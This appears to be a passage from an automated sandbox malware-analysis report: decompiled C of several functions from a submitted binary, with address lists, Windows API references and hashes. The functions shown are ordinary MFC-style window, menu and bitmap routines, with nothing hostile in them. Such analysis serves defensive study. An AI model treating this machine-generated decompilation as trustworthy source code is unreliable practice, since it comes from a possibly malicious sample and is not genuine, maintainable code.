								_a4 = GetDlgItem( *(_t138 + 0x20), _t77);
							}
							ShowWindow(_a4, 5);
							 *(_t138 + 0x60) = _t119[5];
							return E0040819E(_t138, 1);
						}
						 *(_t138 + 0xb4) = _t119[4];
						E0040819E(_t138, _t135);
						_t93 = GetDlgItem( *(_t138 + 0x20),  *_t119);
						_a4 = _t93;
						ShowWindow(_t93, _t135);
						if( *((intOrPtr*)(_t138 + 0xd4)) != 1) {
							_t95 =  *(_t138 + 0xd8);
						} else {
							_t95 = GetMenu( *(_t138 + 0x20));
						}
						_t119[1] = _t95;
						if(_t95 != _t135) {
							InvalidateRect( *(_t138 + 0x20), _t135, 1);
							 *((intOrPtr*)( *_t138 + 0x70))(_t135);
							_t38 = _t138 + 0xe4;
							 *_t38 =  *(_t138 + 0xe4) & 0xfffffffe;
							_t156 =  *_t38;
						}
						_t119[5] =  *(_t138 + 0x60);
						 *(_t138 + 0x60) = _t135;
						_t97 = E00408862(_t138, _t156, 0x7915);
						if( *_t119 != 0xe900) {
							_t97 = GetDlgItem( *(_t138 + 0x20), 0xe900);
							_a4 = _t97;
						}
						if(_a4 == 0) {
							return _t97;
						} else {
							return SetWindowLongA(_a4, 0xfffffff4, 0xea21);
						}
					} else {
						goto L7;
					}
					while(1) {
						L7:
						_t120 = _t138 + 0x84;
						_t135 =  *(E00408692( &_v12));
						if(_t135 == 0) {
							goto L1;
						}
						_t104 = GetDlgCtrlID( *(_t135 + 0x20));
						_t12 = _t104 - 0xe800; // -59392
						_v16 = _t104;
						if(_t12 <= 0x1f) {
							_t14 = _t104 - 0xe800; // -59392
							_v8 = 1 << _t14;
							if( *((intOrPtr*)(_t135->left + 0x168))() != 0) {
								_a8 = _a8 | _v8;
							}
							if( *((intOrPtr*)(_t135->left + 0x170))() == 0 || _v16 != 0xe81f) {
								E00409395(_t138, _t135, _t119[2] & _v8, 1);
							}
						}
						if(_v12 != 0) {
							continue;
						} else {
							_t135 = 0;
							goto L16;
						}
					}
				}
				L1:
				E00406436(_t119, _t120, _t135, _t138, _t139);
				goto L2;
			}



























                  0x004099a0
                  0x004099a9
                  0x004099ae
                  0x004099b0
                  0x004099b2
                  0x004099b4
                  0x004099bb
                  0x004099bd
                  0x004099c3
                  0x004099c8
                  0x00000000
                  0x00000000
                  0x004099cd
                  0x004099cf
                  0x004099d4
                  0x004099dd
                  0x004099dd
                  0x004099d4
                  0x004099e0
                  0x004099e6
                  0x004099e9
                  0x004099ee
                  0x00409a6e
                  0x00409a71
                  0x00409a77
                  0x00409b32
                  0x00409b38
                  0x00409b3e
                  0x00409b46
                  0x00409b48
                  0x00409b4e
                  0x00409b54
                  0x00409b56
                  0x00409b60
                  0x00409b60
                  0x00409b6c
                  0x00409b6c
                  0x00409b72
                  0x00409b76
                  0x00409b7f
                  0x00409b85
                  0x00409b8b
                  0x00409b8e
                  0x00409b9e
                  0x00409ba1
                  0x00409ba6
                  0x00409ba6
                  0x00409b90
                  0x00409b96
                  0x00409b96
                  0x00409b8e
                  0x00409baf
                  0x00409bb2
                  0x00409bb5
                  0x00409bbf
                  0x00409bbf
                  0x00409bc8
                  0x00409bce
                  0x00409bd0
                  0x00409bd2
                  0x00409bde
                  0x00409bde
                  0x00409be6
                  0x00409bf3
                  0x00000000
                  0x00409bf6
                  0x00409a83
                  0x00409a89
                  0x00409a93
                  0x00409a9b
                  0x00409a9e
                  0x00409aab
                  0x00409ab8
                  0x00409aad
                  0x00409ab0
                  0x00409ab0
                  0x00409abe
                  0x00409ac3
                  0x00409acb
                  0x00409ad6
                  0x00409ad9
                  0x00409ad9
                  0x00409ad9
                  0x00409ad9
                  0x00409ae3
                  0x00409aed
                  0x00409af0
                  0x00409afc
                  0x00409b02
                  0x00409b08
                  0x00409b08
                  0x00409b0f
                  0x00409bff
                  0x00409b15
                  0x00000000
                  0x00409b1f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004099f0
                  0x004099f0
                  0x004099f4
                  0x004099ff
                  0x00409a03
                  0x00000000
                  0x00000000
                  0x00409a08
                  0x00409a0e
                  0x00409a14
                  0x00409a1a
                  0x00409a1c
                  0x00409a29
                  0x00409a36
                  0x00409a3b
                  0x00409a3b
                  0x00409a4a
                  0x00409a61
                  0x00409a61
                  0x00409a4a
                  0x00409a6a
                  0x00000000
                  0x00409a6c
                  0x00409a6c
                  0x00000000
                  0x00409a6c
                  0x00409a6a
                  0x004099f0
                  0x004099b6
                  0x004099b6
                  0x00000000

                  APIs
                  • GetDlgCtrlID.USER32 ref: 00409A08
                  • GetDlgItem.USER32 ref: 00409A93
                  • ShowWindow.USER32(00000000,00000000), ref: 00409A9E
                  • GetMenu.USER32(?), ref: 00409AB0
                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00409ACB
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                    • Part of subcall function 00408862: LoadAcceleratorsA.USER32 ref: 00408876
                  • GetDlgItem.USER32 ref: 00409B02
                  • SetWindowLongA.USER32 ref: 00409B1F
                  • GetDlgItem.USER32 ref: 00409B38
                  • GetDlgItem.USER32 ref: 00409B4E
                  • SetWindowLongA.USER32 ref: 00409B60
                  • SetWindowLongA.USER32 ref: 00409B6C
                  • InvalidateRect.USER32(00000001,00000000,00000001), ref: 00409B7F
                  • SetMenu.USER32(00000000,00000000), ref: 00409B96
                  • GetDlgItem.USER32 ref: 00409BD8
                  • ShowWindow.USER32(?,00000005), ref: 00409BE6
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ItemWindow$Long$InvalidateMenuRectShow$AcceleratorsCtrlException@8H_prolog3LoadThrow
                  • String ID:
                  • API String ID: 3936809299-0
                  • Opcode ID: b352d2020b62d51676351764611a56fc418ce6e28d429af2f06858860da0063b
                  • Instruction ID: 49f4313a46f8779e85f491cfa16612e5cc4f4d1fc540ba0bed8de8191aba7d04
                  • Opcode Fuzzy Hash: b352d2020b62d51676351764611a56fc418ce6e28d429af2f06858860da0063b
                  • Instruction Fuzzy Hash: 01814034600600EFCB219F79C888A5ABBB5FF49710F14896AF956EB2A1DB75AD40CF04
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00406B0C, Relevance: 22.6, APIs: 15, Instructions: 144COMMON
                  Download Yara Rule
                  C-Code - Quality: 98%
                  			E00406B0C(signed int _a4, signed int _a8, int _a12) {
				BITMAPINFO* _v8;
				struct HDC__* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t53;
				BITMAPINFO* _t54;
				BITMAPINFO* _t59;
				signed char _t63;
				struct HDC__* _t69;
				struct HBITMAP__* _t70;
				void* _t74;
				struct HDC__* _t75;
				struct HWND__* _t84;
				intOrPtr* _t92;
				void* _t97;
				signed int _t98;
				intOrPtr _t102;
				int* _t103;
				int _t104;
				BITMAPINFO* _t107;

				_t53 = LoadResource(_a4, _a8);
				_t84 = 0;
				_v24 = _t53;
				if(_t53 != 0) {
					_t54 = LockResource(_t53);
					_v8 = _t54;
					__eflags = _t54;
					if(_t54 == 0) {
						goto L1;
					}
					_t101 = _t54->bmiHeader + 0x40;
					_t107 = E0043108C(0, _t97, _t54->bmiHeader + 0x40, _t54->bmiHeader + 0x40);
					__eflags = _t107;
					if(_t107 != 0) {
						E004059F9(_t101, _t107, _t107, _t101, _v8, _t101);
						_t59 = _t107 + _t107->bmiHeader;
						__eflags = _t59;
						_v12 = _t59;
						_a8 = 0;
						do {
							_t92 = _t59 + _a8 * 4;
							_t102 =  *_t92;
							_t98 = 0;
							__eflags = 0;
							_v16 = _t92;
							while(1) {
								__eflags = _t102 -  *((intOrPtr*)(0x44fbec + _t98 * 8));
								if(_t102 ==  *((intOrPtr*)(0x44fbec + _t98 * 8))) {
									break;
								}
								_t98 = _t98 + 1;
								__eflags = _t98 - 4;
								if(_t98 < 4) {
									continue;
								}
								goto L14;
							}
							__eflags = _a12 - _t84;
							if(_a12 == _t84) {
								_t103 = 0x44fbf0 + _t98 * 8;
								_a4 = GetSysColor( *_t103) >> 0x00000008 & 0x000000ff;
								_t63 = GetSysColor( *_t103);
								 *_v16 = GetSysColor( *_t103) >> 0x00000010 & 0x000000ff | ((_t63 & 0x000000ff) << 0x00000008 | _a4) << 0x00000008;
								_t59 = _v12;
								_t84 = 0;
								__eflags = 0;
							} else {
								__eflags =  *(0x44fbf0 + _t98 * 8) - 0x12;
								if( *(0x44fbf0 + _t98 * 8) != 0x12) {
									 *_t92 = 0xffffff;
								}
							}
							L14:
							_a8 = _a8 + 1;
							__eflags = _a8 - 0x10;
						} while (_a8 < 0x10);
						_t104 = _t107->bmiHeader.biWidth;
						_a12 = _t104;
						_a8 = _t107->bmiHeader.biHeight;
						_t69 = GetDC(_t84);
						_v12 = _t69;
						_t70 = CreateCompatibleBitmap(_t69, _t104, _a8);
						_v16 = _t70;
						__eflags = _t70 - _t84;
						if(__eflags != 0) {
							_t75 = CreateCompatibleDC(_v12);
							_t104 = SelectObject;
							_a4 = _t75;
							_v20 = SelectObject(_t75, _v16);
							__eflags = 1;
							StretchDIBits(_a4, _t84, _t84, _a12, _a8, _t84, _t84, _a12, _a8, _v8 + 0x28 + (1 << _t107->bmiHeader.biBitCount) * 4, _t107, _t84, 0xcc0020);
							SelectObject(_a4, _v20);
							DeleteDC(_a4);
						}
						ReleaseDC(_t84, _v12);
						_push(_t107);
						E004316F6(_t84, _t104, _t107, __eflags);
						FreeResource(_v24);
						_t74 = _v16;
						goto L18;
					} else {
						_t74 = 0;
						L18:
						return _t74;
					}
				}
				L1:
				return 0;
			}




























                  0x00406b1b
                  0x00406b21
                  0x00406b23
                  0x00406b28
                  0x00406b32
                  0x00406b38
                  0x00406b3b
                  0x00406b3d
                  0x00000000
                  0x00000000
                  0x00406b43
                  0x00406b4c
                  0x00406b4f
                  0x00406b51
                  0x00406b60
                  0x00406b6a
                  0x00406b6a
                  0x00406b6c
                  0x00406b6f
                  0x00406b72
                  0x00406b75
                  0x00406b78
                  0x00406b7a
                  0x00406b7a
                  0x00406b7c
                  0x00406b7f
                  0x00406b7f
                  0x00406b86
                  0x00000000
                  0x00000000
                  0x00406b88
                  0x00406b89
                  0x00406b8c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406b8e
                  0x00406b90
                  0x00406b93
                  0x00406bad
                  0x00406bc0
                  0x00406bc3
                  0x00406be4
                  0x00406be6
                  0x00406be9
                  0x00406be9
                  0x00406b95
                  0x00406b95
                  0x00406b9d
                  0x00406b9f
                  0x00406b9f
                  0x00406b9d
                  0x00406beb
                  0x00406beb
                  0x00406bee
                  0x00406bee
                  0x00406bf8
                  0x00406bff
                  0x00406c02
                  0x00406c05
                  0x00406c0e
                  0x00406c13
                  0x00406c19
                  0x00406c1c
                  0x00406c1e
                  0x00406c23
                  0x00406c2c
                  0x00406c33
                  0x00406c40
                  0x00406c48
                  0x00406c65
                  0x00406c71
                  0x00406c76
                  0x00406c76
                  0x00406c80
                  0x00406c86
                  0x00406c87
                  0x00406c90
                  0x00406c96
                  0x00000000
                  0x00406b53
                  0x00406b53
                  0x00406c99
                  0x00000000
                  0x00406c9a
                  0x00406b51
                  0x00406b2a
                  0x00000000

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Resource$LoadLock_malloc
                  • String ID:
                  • API String ID: 2582927105-0
                  • Opcode ID: 8cdaa2f3bf9c54f2ba2fe1be78cdd77049d2bf2b09ec426ef17af4b37fb9623c
                  • Instruction ID: ff51ff42c0de1c3a1b4d8765aabfec9eb562106eb3c68f9e24e3f7d0f5cce2f8
                  • Opcode Fuzzy Hash: 8cdaa2f3bf9c54f2ba2fe1be78cdd77049d2bf2b09ec426ef17af4b37fb9623c
                  • Instruction Fuzzy Hash: D9519FB5800218FFDB019FA5CC888AE7BB5FF49314B11843AF916E7260C735AA61DF64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042CFF6, Relevance: 22.6, APIs: 15, Instructions: 84windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 80%
                  			E0042CFF6(intOrPtr* __ecx) {
				void* _v8;
				void* _t19;
				void* _t21;
				void* _t45;

				_push(__ecx);
				if( *(__ecx + 4) != 0) {
					_t21 = SelectObject( *(__ecx + 8), GetStockObject(7));
					_v8 = _t21;
					SelectObject( *(__ecx + 8), _t21);
					SelectObject( *(__ecx + 4), _v8);
					_t45 = SelectObject( *(__ecx + 8), GetStockObject(4));
					SelectObject( *(__ecx + 8), _t45);
					SelectObject( *(__ecx + 4), _t45);
					E00422568(__ecx, GetROP2( *(__ecx + 8)));
					E00422504(__ecx, GetBkMode( *(__ecx + 8)));
					E0042270B(__ecx, GetTextAlign( *(__ecx + 8)));
					E00422536(__ecx, GetPolyFillMode( *(__ecx + 8)));
					E0042259A(__ecx, GetStretchBltMode( *(__ecx + 8)));
					_push(E0042CF92(__ecx, GetTextColor( *(__ecx + 8))));
					 *((intOrPtr*)( *__ecx + 0x30))();
					_push(E0042CF92(__ecx, GetBkColor( *(__ecx + 8))));
					_t19 =  *((intOrPtr*)( *__ecx + 0x2c))();
				}
				return _t19;
			}







                  0x0042cffb
                  0x0042d003
                  0x0042d01f
                  0x0042d025
                  0x0042d028
                  0x0042d030
                  0x0042d03c
                  0x0042d042
                  0x0042d048
                  0x0042d056
                  0x0042d067
                  0x0042d078
                  0x0042d089
                  0x0042d09a
                  0x0042d0b2
                  0x0042d0b5
                  0x0042d0cb
                  0x0042d0ce
                  0x0042d0d2
                  0x0042d0d5

                  APIs
                  • GetStockObject.GDI32(00000007), ref: 0042D013
                  • SelectObject.GDI32(?,00000000), ref: 0042D01F
                  • SelectObject.GDI32(?,00000000), ref: 0042D028
                  • SelectObject.GDI32(00000000,00000000), ref: 0042D030
                  • GetStockObject.GDI32(00000004), ref: 0042D034
                  • SelectObject.GDI32(?,00000000), ref: 0042D03A
                  • SelectObject.GDI32(?,00000000), ref: 0042D042
                  • SelectObject.GDI32(00000000,00000000), ref: 0042D048
                  • GetROP2.GDI32(?), ref: 0042D04D
                    • Part of subcall function 00422568: SetROP2.GDI32(?,?), ref: 00422585
                    • Part of subcall function 00422568: SetROP2.GDI32(?,?), ref: 00422592
                  • GetBkMode.GDI32(?), ref: 0042D05E
                    • Part of subcall function 00422504: SetBkMode.GDI32(?,?), ref: 00422521
                    • Part of subcall function 00422504: SetBkMode.GDI32(?,?), ref: 0042252E
                  • GetTextAlign.GDI32(?), ref: 0042D06F
                    • Part of subcall function 0042270B: SetTextAlign.GDI32(?,?), ref: 0042272A
                    • Part of subcall function 0042270B: SetTextAlign.GDI32(?,?), ref: 00422737
                  • GetPolyFillMode.GDI32(?), ref: 0042D080
                    • Part of subcall function 00422536: SetPolyFillMode.GDI32(?,?), ref: 00422553
                    • Part of subcall function 00422536: SetPolyFillMode.GDI32(?,?), ref: 00422560
                  • GetStretchBltMode.GDI32(?), ref: 0042D091
                    • Part of subcall function 0042259A: SetStretchBltMode.GDI32(?,?), ref: 004225B7
                    • Part of subcall function 0042259A: SetStretchBltMode.GDI32(?,?), ref: 004225C4
                  • GetTextColor.GDI32(?), ref: 0042D0A2
                    • Part of subcall function 0042CF92: GetNearestColor.GDI32(?,?), ref: 0042CF9D
                  • GetBkColor.GDI32(?), ref: 0042D0BB
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Mode$Object$Select$Text$AlignColorFillPolyStretch$Stock$Nearest
                  • String ID:
                  • API String ID: 1146216143-0
                  • Opcode ID: b5fa28f46895a85eae3298702a4519f40f3671a29730695325d86269032407d6
                  • Instruction ID: 2f3b6f2030e1e86d12445eb7730afd10813b0898199679e719625b019b3605a4
                  • Opcode Fuzzy Hash: b5fa28f46895a85eae3298702a4519f40f3671a29730695325d86269032407d6
                  • Instruction Fuzzy Hash: C2216075200A24BFCB217B67DD08D2FBAEAFF88704740842DF15A82570CB75AD52DB69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00426E96, Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 272stringwindowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 75%
                  			E00426E96(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				long _v32;
				char _v268;
				char _v292;
				void* _v296;
				signed int _v300;
				char _v304;
				signed int _v308;
				long _v312;
				char _v316;
				char _v320;
				signed int _t103;
				void* _t110;
				long _t115;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t139;
				intOrPtr _t142;
				void* _t146;
				intOrPtr* _t148;
				void* _t171;
				void* _t181;
				void* _t183;
				int _t184;
				signed int _t185;
				intOrPtr* _t186;
				signed int _t187;
				intOrPtr _t188;
				int _t203;
				void* _t220;
				CHAR* _t222;
				intOrPtr* _t223;
				signed int _t224;
				void* _t225;
				intOrPtr* _t227;
				signed int _t228;
				void* _t229;
				signed int _t231;
				signed int _t233;
				void* _t234;

				_t220 = __edx;
				_t186 = __ecx;
				_t181 = __ebx;
				_t231 = _t233;
				_t234 = _t233 - 0x108;
				_t103 =  *0x463404; // 0x38a11573
				_v8 = _t103 ^ _t231;
				_push(__esi);
				_push(__edi);
				_t222 = _a4;
				_t227 = __ecx;
				if(_t222 == 0 || lstrlenA(_t222) >= 0x104) {
					_push(0);
					_push(0xffffffff);
					_push(3);
					E0042EA62(_t181, _t220, _t222, _t227, __eflags);
					asm("int3");
					_push(0x130);
					E00431B04(E0044C36D, _t181, _t222, _t227);
					_t228 = _a4;
					__eflags = _t228;
					_t223 = _t186;
					__eflags = 0 | _t228 != 0x00000000;
					if(__eflags == 0) {
						E00406436(_t181, _t186, _t223, _t228, __eflags);
					}
					_t187 =  *(_t228 + 0xc);
					_t182 = _t223 + 0x1c;
					_t110 =  *_t182;
					__eflags =  *(_t110 - 0xc);
					if( *(_t110 - 0xc) == 0) {
						__eflags = _t187;
						if(_t187 != 0) {
							E0041F5B6(_t182, _t187,  *(_t228 + 4), _t182, 0);
						}
					}
					_t188 =  *((intOrPtr*)( *((intOrPtr*)(_t223 + 8))));
					__eflags =  *(_t188 - 0xc);
					if( *(_t188 - 0xc) != 0) {
						__eflags =  *(_t228 + 0xc);
						if( *(_t228 + 0xc) != 0) {
							_t183 = 0;
							__eflags =  *(_t223 + 4);
							if( *(_t223 + 4) > 0) {
								do {
									DeleteMenu( *( *(_t228 + 0xc) + 4),  *(_t228 + 4) + _t183, 0);
									_t183 = _t183 + 1;
									__eflags = _t183 -  *(_t223 + 4);
								} while (_t183 <  *(_t223 + 4));
							}
							_t182 = 0x104;
							_t115 = GetCurrentDirectoryA(0x104,  &_v292);
							__eflags = _t115;
							if(_t115 != 0) {
								__eflags = _t115 - 0x104;
								if(_t115 < 0x104) {
									_t184 = lstrlenA( &_v292);
									 *((char*)(_t231 + _t184 - 0x120)) = 0x5c;
									_t182 = _t184 + 1;
									_v312 = _t182;
									 *((char*)(_t231 + _t182 - 0x120)) = 0;
									E004014C0( &_v308, _t220);
									_v8 = _v8 & 0x00000000;
									E004014C0( &_v304, _t220);
									_v300 = _v300 & 0x00000000;
									__eflags =  *(_t223 + 4);
									_v8 = 1;
									if( *(_t223 + 4) > 0) {
										while(1) {
											_t125 =  *((intOrPtr*)( *_t223 + 8))( &_v308, _v300,  &_v292, _t182, 1);
											__eflags = _t125;
											if(_t125 == 0) {
												goto L42;
											}
											_t185 = _v308;
											_v296 = E004014F0( &_v304,  *((intOrPtr*)(_t185 - 0xc)) +  *((intOrPtr*)(_t185 - 0xc)));
											while(1) {
												_t129 =  *_t185;
												__eflags = _t129;
												if(_t129 == 0) {
													break;
												}
												__eflags = _t129 - 0x26;
												if(_t129 == 0x26) {
													_t59 =  &_v296;
													 *_t59 = _v296 + 1;
													__eflags =  *_t59;
													 *_v296 = 0x26;
												}
												_t131 = E00434A02( *_t185);
												__eflags = _t131;
												if(_t131 != 0) {
													_v296 = _v296 + 1;
													 *_v296 =  *_t185;
													_t185 = _t185 + 1;
													__eflags = _t185;
												}
												_v296 = _v296 + 1;
												 *_v296 =  *_t185;
												_t185 = _t185 + 1;
												__eflags = _t185;
											}
											 *_v296 = 0;
											E0040A356( &_v304, 0xffffffff);
											_t139 =  *((intOrPtr*)(_t223 + 0x14)) + _v300 + 0x00000001 & 0x0000000f;
											_t203 = 0xa;
											__eflags = _t139 - _t203;
											if(__eflags <= 0) {
												if(__eflags != 0) {
													_push(_t139);
													_push("&%d ");
													goto L40;
												} else {
													E004048C1(_t185, _t203, _t223, _t228, E00433C67(_t220,  &_v32, _t203, "1&0 "));
												}
											} else {
												_push(_t139);
												_push("%d ");
												L40:
												swprintf( &_v32, _t203);
											}
											_t142 =  *((intOrPtr*)(_t228 + 8));
											_t182 =  *(_t228 + 4);
											_v296 = _t142;
											 *((intOrPtr*)(_t228 + 8)) = _t142 + 1;
											_t79 = _t182 + 1; // 0x2
											 *(_t228 + 4) = _t79;
											_push( &_v32);
											_t146 = E00406039( *(_t228 + 4),  &_v320, _t220, _t223, _t228, __eflags);
											_push( &_v304);
											_push(_t146);
											_push( &_v316);
											_v8 = 2;
											_t148 = E00426CA7( *(_t228 + 4), _t223, _t228, __eflags);
											_t234 = _t234 + 0x1c;
											E00426898( *(_t228 + 0xc), _v296, 0x400,  *(_t228 + 4),  *_t148);
											E004010B0(_v316 + 0xfffffff0, _t220);
											_v8 = 1;
											E004010B0(_v320 + 0xfffffff0, _t220);
											_v300 = _v300 + 1;
											__eflags = _v300 -  *(_t223 + 4);
											if(_v300 <  *(_t223 + 4)) {
												_t182 = _v312;
												continue;
											}
											goto L42;
										}
									}
									L42:
									 *((intOrPtr*)(_t228 + 8)) =  *((intOrPtr*)(_t228 + 8)) - 1;
									 *((intOrPtr*)(_t228 + 0x20)) = GetMenuItemCount( *( *(_t228 + 0xc) + 4));
									 *((intOrPtr*)(_t228 + 0x18)) = 1;
									E004010B0(_v304 + 0xfffffff0, _t220);
									__eflags = _v308 + 0xfffffff0;
									E004010B0(_v308 + 0xfffffff0, _t220);
								}
							}
						}
					} else {
						_t182 =  *_t182;
						__eflags =  *(_t182 - 0xc);
						if( *(_t182 - 0xc) != 0) {
							 *((intOrPtr*)( *_t228 + 0xc))(_t182);
						}
						 *((intOrPtr*)( *_t228))(0);
					}
					return E00431B87(_t182, _t223, _t228);
				} else {
					E004292D1( &_v268, _t222);
					_t224 = 0;
					if( *((intOrPtr*)(_t227 + 4)) - 1 > 0) {
						while(E004289FF(_t227,  *((intOrPtr*)( *((intOrPtr*)(_t227 + 8)) + _t224 * 4)),  &_v268) == 0) {
							_t224 = _t224 + 1;
							if(_t224 <  *((intOrPtr*)(_t227 + 4)) - 1) {
								continue;
							} else {
								L8:
								while(_t224 > 0) {
									E004057D4( *((intOrPtr*)(_t227 + 8)) + _t224 * 4,  *((intOrPtr*)(_t227 + 8)) + _t224 * 4 - 4);
									_t224 = _t224 - 1;
									__eflags = _t224;
								}
								goto L9;
							}
							goto L8;
						}
						goto L8;
					}
					L9:
					_t171 = E00402830(_t220, _t224,  &_v268);
					_pop(_t225);
					_pop(_t229);
					return E00430650(_t171, _t181, _v8 ^ _t231, _t220, _t225, _t229);
				}
			}












































                  0x00426e96
                  0x00426e96
                  0x00426e96
                  0x00426e99
                  0x00426e9b
                  0x00426ea1
                  0x00426ea8
                  0x00426eab
                  0x00426eac
                  0x00426ead
                  0x00426eb0
                  0x00426eb4
                  0x00426f30
                  0x00426f32
                  0x00426f34
                  0x00426f36
                  0x00426f3b
                  0x00426f3c
                  0x00426f46
                  0x00426f4b
                  0x00426f50
                  0x00426f55
                  0x00426f57
                  0x00426f59
                  0x00426f5b
                  0x00426f5b
                  0x00426f60
                  0x00426f63
                  0x00426f66
                  0x00426f68
                  0x00426f6c
                  0x00426f6e
                  0x00426f70
                  0x00426f78
                  0x00426f78
                  0x00426f70
                  0x00426f80
                  0x00426f84
                  0x00426f87
                  0x00426fa5
                  0x00426fa8
                  0x00426fae
                  0x00426fb0
                  0x00426fb3
                  0x00426fb5
                  0x00426fc3
                  0x00426fc9
                  0x00426fca
                  0x00426fca
                  0x00426fb5
                  0x00426fd6
                  0x00426fdc
                  0x00426fe2
                  0x00426fe4
                  0x00426fea
                  0x00426fec
                  0x00426fff
                  0x00427001
                  0x00427009
                  0x00427010
                  0x00427016
                  0x0042701e
                  0x00427023
                  0x0042702d
                  0x00427032
                  0x00427039
                  0x0042703d
                  0x00427041
                  0x0042704f
                  0x0042706a
                  0x0042706d
                  0x0042706f
                  0x00000000
                  0x00000000
                  0x00427075
                  0x0042708c
                  0x004270d7
                  0x004270d7
                  0x004270d9
                  0x004270db
                  0x00000000
                  0x00000000
                  0x00427094
                  0x00427096
                  0x0042709e
                  0x0042709e
                  0x0042709e
                  0x004270a4
                  0x004270a4
                  0x004270ab
                  0x004270b1
                  0x004270b3
                  0x004270bd
                  0x004270c3
                  0x004270c5
                  0x004270c5
                  0x004270c5
                  0x004270ce
                  0x004270d4
                  0x004270d6
                  0x004270d6
                  0x004270d6
                  0x004270eb
                  0x004270ee
                  0x00427102
                  0x00427105
                  0x00427106
                  0x00427108
                  0x00427112
                  0x0042712b
                  0x0042712c
                  0x00000000
                  0x00427114
                  0x00427124
                  0x00427124
                  0x0042710a
                  0x0042710a
                  0x0042710b
                  0x00427131
                  0x00427136
                  0x00427136
                  0x0042713b
                  0x0042713e
                  0x00427141
                  0x0042714b
                  0x0042714e
                  0x00427151
                  0x00427157
                  0x0042715e
                  0x00427169
                  0x0042716a
                  0x00427171
                  0x00427172
                  0x00427176
                  0x0042717e
                  0x0042718f
                  0x0042719d
                  0x004271ab
                  0x004271af
                  0x004271b4
                  0x004271c0
                  0x004271c3
                  0x00427049
                  0x00000000
                  0x00427049
                  0x00000000
                  0x004271c3
                  0x0042704f
                  0x004271c9
                  0x004271cc
                  0x004271e1
                  0x004271e4
                  0x004271eb
                  0x004271f6
                  0x004271f9
                  0x004271f9
                  0x00426fec
                  0x00426fe4
                  0x00426f89
                  0x00426f89
                  0x00426f8b
                  0x00426f8e
                  0x00426f95
                  0x00426f95
                  0x00426f9e
                  0x00426f9e
                  0x00427203
                  0x00426ec4
                  0x00426ecc
                  0x00426ed4
                  0x00426ed9
                  0x00426edb
                  0x00426ef5
                  0x00426ef9
                  0x00000000
                  0x00426efb
                  0x00000000
                  0x00426f0d
                  0x00426f07
                  0x00426f0c
                  0x00426f0c
                  0x00426f0c
                  0x00000000
                  0x00426f0d
                  0x00000000
                  0x00426ef9
                  0x00000000
                  0x00426edb
                  0x00426f11
                  0x00426f1b
                  0x00426f23
                  0x00426f26
                  0x00426f2d
                  0x00426f2d

                  APIs
                  • lstrlenA.KERNEL32(?), ref: 00426EB7
                  • __EH_prolog3_GS.LIBCMT ref: 00426F46
                  • DeleteMenu.USER32(?,?,00000000,00000130,00000003,000000FF,00000000), ref: 00426FC3
                  • GetCurrentDirectoryA.KERNEL32(00000104,00000130,00000130,00000003,000000FF,00000000), ref: 00426FDC
                  • lstrlenA.KERNEL32(?), ref: 00426FF9
                  • swprintf.LIBCMT ref: 00427136
                    • Part of subcall function 004289FF: lstrcmpiA.KERNEL32(00000000,00000000,00000000,?), ref: 00428A24
                  • _strcpy_s.LIBCMT ref: 0042711E
                  • GetMenuItemCount.USER32 ref: 004271D2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
